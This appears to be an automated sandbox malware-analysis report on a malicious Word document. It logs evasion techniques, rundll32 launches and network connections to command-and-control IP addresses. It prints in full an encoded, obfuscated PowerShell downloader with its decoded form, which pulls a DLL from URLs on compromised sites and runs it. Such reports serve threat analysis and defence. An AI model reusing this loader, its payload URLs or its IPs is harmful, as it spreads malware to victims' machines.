Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\Users\user\Kaktksw\An6othh\N49I.dll

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 00000008.00000002.2094600564.00000000007CD000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F1D4D mov eax, dword ptr fs:[00000030h]	7_2_001F1D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002912C1 mov eax, dword ptr fs:[00000030h]	7_2_002912C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00411D4D mov eax, dword ptr fs:[00000030h]	8_2_00411D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007112C1 mov eax, dword ptr fs:[00000030h]	8_2_007112C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001812C1 mov eax, dword ptr fs:[00000030h]	9_2_001812C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A12C1 mov eax, dword ptr fs:[00000030h]	10_2_003A12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D12C1 mov eax, dword ptr fs:[00000030h]	11_2_003D12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001F12C1 mov eax, dword ptr fs:[00000030h]	12_2_001F12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00661D4D mov eax, dword ptr fs:[00000030h]	13_2_00661D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B12C1 mov eax, dword ptr fs:[00000030h]	13_2_001B12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00411D4D mov eax, dword ptr fs:[00000030h]	14_2_00411D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D12C1 mov eax, dword ptr fs:[00000030h]	14_2_001D12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00171D4D mov eax, dword ptr fs:[00000030h]	15_2_00171D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_002B12C1 mov eax, dword ptr fs:[00000030h]	15_2_002B12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00281D4D mov eax, dword ptr fs:[00000030h]	16_2_00281D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_001A12C1 mov eax, dword ptr fs:[00000030h]	16_2_001A12C1

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 217.160.169.110 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.255.203.164 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.183.16.47 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 84.232.229.24 80	Jump to behavior

Encrypted powershell cmdline option found

Source: unknown	Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

